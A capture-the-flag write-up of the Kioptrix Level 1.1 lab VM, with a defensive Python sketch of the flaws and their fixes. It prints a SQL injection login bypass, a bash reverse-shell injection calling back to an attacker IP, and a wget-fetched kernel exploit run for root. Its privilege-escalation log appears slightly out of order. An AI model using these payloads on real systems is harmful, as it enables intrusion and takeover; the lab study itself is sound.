Kioptrix Level 1.1 (#2)
Hello, today I'll share how to break the second instance of Kioptrix.
From the author's description:
This Kioptrix VM Image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.
An Nmap scan shows a couple of services:
# nmap 192.168.0.104 -sT -sV -O -n
-- snip --
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http    Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind 2 (RPC #100000)
443/tcp  open  ssl/https?
631/tcp  open  ipp     CUPS 1.1
3306/tcp open  mysql   MySQL (unauthorized)
-- snip --
I'll show how an attacker can easily use the HTTP service to gain a reverse shell.
SQL Injection authentication bypass
Opening the main HTTP page shows a login page:
Inserting values like
username: administrator
password: ' OR 'a'='a
makes the SQL condition always true and therefore creates a session without actual credentials.
After logging in we are presented with another form:
It seems to be a simple tool running ping on a given IP. I make an educated guess that it simply runs ping through a bash command, so another command injected after a semicolon should also be executed:
Having confirmed the vulnerability, I inject a simple reverse shell:
; bash -i >& /dev/tcp/192.168.0.105/443 0>&1
That should return a shell to the attacker's machine:
# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.0.105] from (UNKNOWN) [192.168.0.104] 32770
bash: no job control in this shell
bash-3.00$ whoami
apache
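As an added illustration (not code from the original post, and not the Kioptrix VM's own application code, which the write-up never shows), the following Python sketch reproduces both bugs abused above beside their fixes: a login that concatenates user input into SQL next to a parameterised one, and a ping helper that would hand `;`-separated input to a shell next to one that validates the IP and passes an argument list instead. The user table, credentials and function names are assumptions.

```python
import ipaddress
import sqlite3
import subprocess


def make_db():
    # Constructed in-memory stand-in for the VM's login table (assumed schema).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return db


def login_vulnerable(db, username, password):
    # User input is pasted into the query text. With password = ' OR 'a'='a the
    # WHERE clause becomes (username='...' AND password='') OR 'a'='a', always true.
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return db.execute(sql).fetchone() is not None


def login_safe(db, username, password):
    # Parameterised query: the quotes in the payload are data, not SQL syntax.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


def ping_command_vulnerable(target):
    # The string a shell-based ping form would build; passed to a shell, a ';'
    # in target terminates ping and starts whatever follows (e.g. a reverse shell).
    return "ping -c 1 " + target


def build_ping_command(target):
    # Hardened form: accept only a syntactically valid IP address and return an
    # argv list, so the value is never interpreted by a shell. None = rejected.
    try:
        addr = ipaddress.ip_address(target.strip())
    except ValueError:
        return None
    return ["ping", "-c", "1", str(addr)]


def run_ping(target):
    # Executes the validated argv without shell=True; rejected input never runs.
    argv = build_ping_command(target)
    if argv is None:
        raise ValueError("target is not an IP address")
    return subprocess.run(argv, capture_output=True, text=True).returncode
```

A rejected `build_ping_command` result is also a cheap detection signal: logging every non-IP submission to the ping form surfaces injection attempts like the one used in this write-up.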
The server seems to be running an outdated system version:
# nc -nvlp 443
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
Kernel version 2.6.9-55.EL is vulnerable to a privilege escalation vulnerability. I download the source code to the attacker's machine. Then I download, compile and run the exploit on the victim:
bash-3.00$ cd /tmp
bash-3.00$ wget 192.168.0.105/9542.c
-- snip --
12:44:16 (360.08 MB/s) - '9542.c' saved [2643/2643]
bash-3.00$ gcc 9542.c -o 9542
9542.c:109:28: warning: no newline at end of file
sh-3.00# python -c 'import pty; pty.spawn("/bin/sh")'
sh-3.00# ./9542
./9542
[-] check ur uid
sh-3.00# id
id
uid=0(root) gid=0(root) groups=48(apache)
Time for root dance :)